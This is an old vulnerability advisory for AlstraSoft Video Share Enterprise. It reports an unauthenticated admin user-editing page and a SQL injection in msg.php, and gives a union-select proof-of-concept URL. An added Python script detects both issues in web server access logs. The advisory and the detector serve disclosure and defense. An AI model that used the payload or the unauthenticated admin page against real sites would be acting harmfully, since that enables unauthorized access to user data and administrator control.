by r0t,der4444,cembo,VietMafia

Thursday, March 29, 2007

AlstraSoft Video Share Enterprise - Information disclosure & SQL injection vuln

discovered by : VietMafia
developer's site:
script: AlstraSoft Video Share Enterprise
risk: medium
status: unpatched

This script has a vulnerability which can be exploited by malicious people to disclose sensitive information and gain access to the system as administrator.

1. The file siteadmin/useredit.php can be accessed without any authentication. User information can be viewed and edited after that.



2. SQL injection

Once logged in as a registered user, there is a SQL injection vulnerability in the msg.php file (the id parameter).

PoC: http://host/path/msg.php?id=-1%20union%20select%201,version(),1,1,1,1,1,1,1
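Added detection example, not part of the original advisory: a small log check that flags the two issues above in web server access logs, the union-style payload in the msg.php id parameter (which should only ever be a number) and any direct request to siteadmin/useredit.php. The log lines, IPs and /videoshare/ path are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access log lines (hypothetical IPs and install path).
SAMPLE_LOG = """\
10.0.0.5 - - [29/Mar/2007:10:01:02 +0000] "GET /videoshare/msg.php?id=42 HTTP/1.1" 200 1532
10.0.0.9 - - [29/Mar/2007:10:01:07 +0000] "GET /videoshare/msg.php?id=-1%20union%20select%201,version(),1,1,1,1,1,1,1 HTTP/1.1" 200 1601
10.0.0.9 - - [29/Mar/2007:10:01:20 +0000] "GET /videoshare/siteadmin/useredit.php?id=1 HTTP/1.1" 200 2201
10.0.0.7 - - [29/Mar/2007:10:02:11 +0000] "GET /videoshare/index.php HTTP/1.1" 200 880
"""

# Common/combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
# Keywords typical of a union-based injection, matched after URL decoding.
SQLI_RE = re.compile(r'\b(?:union\s+(?:all\s+)?select|information_schema)\b|version\s*\(', re.I)

def analyze_line(line):
    """Return a list of (reason, ip, target) findings for one access log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    ip, target = m.group('ip'), m.group('target')
    parts = urlsplit(target)
    path = parts.path.lower()
    params = parse_qs(parts.query, keep_blank_values=True)  # already percent-decodes once
    findings = []
    # 1. The admin editor enforces no authentication, so every hit on it deserves
    #    review; the web server log is the only audit trail for it.
    if path.endswith('/siteadmin/useredit.php'):
        findings.append(('admin-page-access', ip, target))
    # 2. msg.php expects a numeric id; anything else is suspicious, and SQL
    #    keywords in the decoded value point at an injection attempt.
    if path.endswith('/msg.php'):
        for raw in params.get('id', []):
            val = unquote_plus(raw)  # second decode catches double-encoded payloads
            if not re.fullmatch(r'\d+', val):
                reason = 'sqli-union' if SQLI_RE.search(val) else 'non-numeric-id'
                findings.append((reason, ip, target))
    return findings

def analyze_log(text):
    """Run analyze_line over every line of a log and collect the findings."""
    return [f for line in text.splitlines() for f in analyze_line(line)]

if __name__ == '__main__':
    for reason, ip, target in analyze_log(SAMPLE_LOG):
        print(f'{reason:18} {ip:10} {target}')
```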

Thanks DH for helping me verify this. :)




Copyright (c) 2006 Pridels Sec Crew